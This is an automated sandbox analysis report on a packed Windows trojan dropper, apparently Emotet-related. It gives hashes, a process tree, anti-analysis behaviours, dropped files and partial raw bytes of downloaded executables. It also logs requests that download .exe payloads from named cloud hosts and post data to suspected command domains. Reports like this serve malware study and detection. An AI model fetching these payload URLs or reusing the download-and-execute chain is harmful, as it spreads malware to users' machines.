Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 30, 2022, 10:39 a.m.	Oct. 30, 2022, 10:45 a.m.

Size	380.9KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`96ecd3b0e089a8953f2c94886388b0a6`
SHA256	`6be048992227daa3e44558b5e8b342f3f153eb0ff535ab399f4cd4ae3e4345bb`
CRC32	`47D18BDB`
ssdeep	`6144:x/QiQXCtkm+ksmpk3U9j0ISOGBfj/WUplm6zIOYQNd28pTXdAmpCLVRZoglM7Lk0:pQi3tP6m6UR0ISlL//plmW9bTXeVhDrE`
Yara	Win32_Trojan_Emotet_2_Zero - Win32 Trojan Emotet IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file

Bolt.exe "C:\Users\test22\AppData\Local\Temp\Bolt.exe"
2556
- Bolt.tmp "C:\Users\test22\AppData\Local\Temp\is-HDASO.tmp\Bolt.tmp" /SL5="$80178,140559,56832,C:\Users\test22\AppData\Local\Temp\Bolt.exe"
  2608
  - PowerOff.exe "C:\Users\test22\AppData\Local\Temp\is-AMRB4.tmp\PowerOff.exe" /S /UID=95
    2756
    - ZHaelybugime.exe "C:\Users\test22\AppData\Local\Temp\bf-08739-13a-43da7-020a8270e83eb\ZHaelybugime.exe"
      1404
    - Nufaluzhura.exe "C:\Users\test22\AppData\Local\Temp\07-54cb5-79a-b0ea5-0b589ee963af4\Nufaluzhura.exe"
      1728
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        1852
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1852 CREDAT:145409
        1616
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
doll.s3.pl-waw.scw.cloud	A 151.115.10.1 CNAME s3.pl-waw.scw.cloud	151.115.10.1
apps.identrust.com	A 23.53.228.9 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 23.53.228.10 A 121.254.136.27 A 121.254.136.57	23.53.228.9
360devtracking.com	A 37.230.138.66	37.230.138.66
www.profitabletrustednetwork.com	A 173.233.137.36 A 173.233.139.164 A 192.243.61.227 A 192.243.61.225 A 173.233.137.60 A 192.243.59.12 A 192.243.59.20 A 192.243.59.13 A 173.233.137.52 A 173.233.137.44	173.233.137.60
www.google.com	A 172.217.175.68	142.250.76.132
connectini.net	A 37.230.138.123	37.230.138.123
wewewe.s3.eu-central-1.amazonaws.com	CNAME s3-r-w.eu-central-1.amazonaws.com A 52.219.74.69	52.219.169.122
google.com	A 142.251.42.174	142.250.206.206
dotexe.s3.pl-waw.scw.cloud	A 151.115.10.1 CNAME s3.pl-waw.scw.cloud	151.115.10.1

IP Address	Status	Action
121.254.136.57	Active	Moloch
142.251.42.174	Active	Moloch
151.115.10.1	Active	Moloch
164.124.101.2	Active	Moloch
172.217.175.68	Active	Moloch
192.243.59.20	Active	Moloch
23.53.228.10	Active	Moloch
23.53.228.9	Active	Moloch
37.230.138.123	Active	Moloch
37.230.138.66	Active	Moloch
52.219.74.69	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Oct. 30, 2022, 10:32 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW Oct. 30, 2022, 10:32 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 30, 2022, 10:39 a.m.			0	0
IsDebuggerPresent Oct. 30, 2022, 10:39 a.m.			0	0
IsDebuggerPresent Oct. 30, 2022, 10:39 a.m.			0	0
IsDebuggerPresent Oct. 30, 2022, 10:32 a.m.			0	0
IsDebuggerPresent Oct. 30, 2022, 10:32 a.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 30, 2022, 10:39 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Oct. 30, 2022, 10:40 a.m.	stacktrace: bolt+0x816a8 @ 0x4816a8 bolt+0x99c13 @ 0x499c13 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xeedface exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 1637924 registers.edi: 4523332 registers.eax: 1637924 registers.ebp: 1638004 registers.edx: 0 registers.ebx: 0 registers.esi: 2 registers.ecx: 7	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (13 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://dotexe.s3.pl-waw.scw.cloud/el3ou9/up-da-f04wu5vfo2mvjsxlfpn0.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://dotexe.s3.pl-waw.scw.cloud/el3ou9/hand-f04wu5vfo2mvjsxlfpn0.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://dotexe.s3.pl-waw.scw.cloud/el3ou9/pub-f04wu5vfo2mvjsxlfpn0.exe
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.google.com/
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/SuperNitouDisc.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://doll.s3.pl-waw.scw.cloud/widgets/powerOff.exe
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/Conumer4Publisher.php
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/Conumer2kenpachi.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/Series/publisher/1/KR.json
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/Series/configPoduct/2/goodchannel.json

Performs some HTTP requests (16 events)

request	HEAD http://dotexe.s3.pl-waw.scw.cloud/Inventory/poweroff.exe
request	GET http://dotexe.s3.pl-waw.scw.cloud/Inventory/poweroff.exe
request	GET http://dotexe.s3.pl-waw.scw.cloud/el3ou9/up-da-f04wu5vfo2mvjsxlfpn0.exe
request	GET http://dotexe.s3.pl-waw.scw.cloud/el3ou9/hand-f04wu5vfo2mvjsxlfpn0.exe
request	GET http://dotexe.s3.pl-waw.scw.cloud/el3ou9/pub-f04wu5vfo2mvjsxlfpn0.exe
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies
request	GET http://www.google.com/
request	POST https://connectini.net/Series/SuperNitouDisc.php
request	GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe
request	GET https://doll.s3.pl-waw.scw.cloud/widgets/powerOff.exe
request	POST https://connectini.net/Series/Conumer4Publisher.php
request	POST https://connectini.net/Series/Conumer2kenpachi.php
request	GET https://connectini.net/Series/publisher/1/KR.json
request	GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json
request	GET https://connectini.net/Series/configPoduct/2/goodchannel.json

Sends data using the HTTP POST Method (4 events)

request	POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies
request	POST https://connectini.net/Series/SuperNitouDisc.php
request	POST https://connectini.net/Series/Conumer4Publisher.php
request	POST https://connectini.net/Series/Conumer2kenpachi.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 637 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 40960 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 20480 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:40 a.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000046f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000a30000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000bf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef423b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000a30000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba4000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9440c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94520000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94521000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94522000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94523000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94524000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe944ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe944d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe944b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94525000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94526000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9440d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94527000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 30, 2022, 10:39 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94528000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

A process attempted to delay the analysis task. (2 events)

description	ZHaelybugime.exe tried to sleep 174 seconds, actually delayed analysis time by 174 seconds
description	Nufaluzhura.exe tried to sleep 193 seconds, actually delayed analysis time by 193 seconds

Creates executable files on the filesystem (6 events)

file	C:\Users\test22\AppData\Local\Temp\is-AMRB4.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-AMRB4.tmp\idp.dll
file	C:\Users\test22\AppData\Local\Temp\bf-08739-13a-43da7-020a8270e83eb\ZHaelybugime.exe
file	C:\Users\test22\AppData\Local\Temp\07-54cb5-79a-b0ea5-0b589ee963af4\Nufaluzhura.exe
file	C:\Program Files (x86)\Google\Wyhaehawoshy.exe
file	C:\Users\test22\AppData\Local\Temp\is-AMRB4.tmp\PowerOff.exe

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\bf-08739-13a-43da7-020a8270e83eb\ZHaelybugime.exe
file	C:\Users\test22\AppData\Local\Temp\07-54cb5-79a-b0ea5-0b589ee963af4\Nufaluzhura.exe

Drops an executable to the user AppData folder (6 events)

file	C:\Users\test22\AppData\Local\Temp\07-54cb5-79a-b0ea5-0b589ee963af4\Nufaluzhura.exe
file	C:\Users\test22\AppData\Local\Temp\is-AMRB4.tmp\PowerOff.exe
file	C:\Users\test22\AppData\Local\Temp\bf-08739-13a-43da7-020a8270e83eb\ZHaelybugime.exe
file	C:\Users\test22\AppData\Local\Temp\is-AMRB4.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-AMRB4.tmp\idp.dll
file	C:\Users\test22\AppData\Local\Temp\is-HDASO.tmp\Bolt.tmp

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 30, 2022, 10:40 a.m.	process_identifier: 1616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x06660000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 30, 2022, 10:39 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the processes bolt.tmp, poweroff.exe (4 events)

Time & API	Arguments	Status	Return
InternetReadFile Oct. 30, 2022, 10:39 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL.Ü³à"0bJ^ @ @K PF H.textda b `.rsrcPF Hd@@.reloc¬@B@HÈ×H©,pÂ1[³â§¨ÇÜm¯âº{[g0ÌN12«óµ$\|×!3Õá8;)×sàp[åÅ¶vçF#!ÅÉ«'·¶J4mov÷I!bM¥òÁòÞÙÂÊL}Ej<*,Llíë¬Tµds©j8NC1)Ùà¤cP¨aî6#ÏJñÚù4¿SÛÕ',,±è[ ·T\|b6Lf@÷=çUUá«luªÄWjWý6®®^D>uóÏN(íÞ`®vf%Ò³¯YÀ!º?Î6Ó¯ñÞï Ô÷Ä¤b\MX0©¬i?D©e×_<uº¬1ÿkðKkyÐÉ HCì±:PHT:ú¤öãÍ0£¯\|pJåÖCì-?ÊñDsÓ([Q1ºTÄ(»+ü\|«Ý¤_;`¦±§§G&äaÍ§lÖVë·"ùÒ¥Üäq¯Ñu"pE'~¿&÷ÆGVú gÝLÅ1ÀÎ¦nI¨%´A(oi0xR$2V!: request_handle: 0x00cc000c	1	1
recv Oct. 30, 2022, 10:39 a.m.	buffer: HTTP/1.1 200 OK content-length: 121856 x-amz-id-2: tx22ab1c5efa064f7c9fc8b-00635dd6bb accept-ranges: bytes last-modified: Fri, 28 Oct 2022 16:05:39 GMT etag: "4d3447591a28bfbb4b0534132adfeb17" x-amz-request-id: tx22ab1c5efa064f7c9fc8b-00635dd6bb x-amz-version-id: 1666973139770925 content-type: application/x-msdownload date: Sun, 30 Oct 2022 01:43:23 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL4«¡à"06¤®T `@ @@YTO`\| ¸S8 H.textÄ4 6 `.rsrc\| `¢8@@.reloc Ú@BTH((Ø* S¸0:( !%rp¢%rQp¢%rqp¢%rÝp¢%r7p¢%rKp¢%r2p¢%rBp¢%rõp¢% rp¢% rAp¢%rÚp¢%rp¢% rp¢%ráp¢%rzp¢%rp¢%r¨p¢%rA p¢%rÖ p¢%ro p¢%rp¢%rp¢%r6p¢%rPp¢%rhp¢%rÎp¢%rèp¢%r p¢%r$ p¢%r p¢%r¶ p¢% rÖ p¢( ( ( 0¡~%-&~þs %( À( s o rø prpo o rDprZpo o Þ ,o ÜÞ)&Þ$&s o Þ ,o ÜÞ&Þ@44h $Rv \|$R{$0B( , s +s! o" rEpo# ($ -Þ Þ&Þ+;( 0¶(% (& rQpo' o( 5%Ð() ( o+ 5 (, o- o. s/ o0 s1 (& o' %io2 %o3 o4 o5 o5 i(6 0Ê(% (& rQpo' o( 5%Ð() ( o+ 5 (, o- o. s/ o7 s1 ~8 (9 io2 o3 o4 (& io: Þo5 o5 Ü};¸( 0rkprFp ( (; o< (= r!p(; o< 